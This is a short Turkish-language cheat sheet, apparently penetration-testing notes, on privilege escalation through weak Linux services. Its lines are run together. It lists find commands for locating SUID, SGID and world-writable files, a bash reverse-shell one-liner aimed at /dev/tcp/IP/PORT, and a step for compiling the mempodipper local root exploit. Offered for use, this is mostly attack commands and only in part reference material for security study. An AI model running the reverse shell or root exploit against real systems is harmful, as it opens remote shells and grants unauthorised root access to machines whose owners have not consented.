Zayıf Servisler
Zayıf Servislerden Kaynaklı Hak ve Yetki Yükseltme Saldırıları
Last updated
# find / -perm -u=s -type f 2>/dev/null
# find directory -user root -perm -4000 -exec ls -ldb {} \; >/tmp/filename
# find / -perm -2 ! -type l -ls 2 > /dev/null (List writable file)#Find SUID
find / -perm -u=s -type f 2>/dev/null
#Find GUID
find / -perm -g=s -type f 2>/dev/null# bash -i >& /dev/tcp/IP/PORT 0>&1# mempodipper - Linux root exploit >=2.6.39 x64 and x86
# gcc exploit.c -o exploit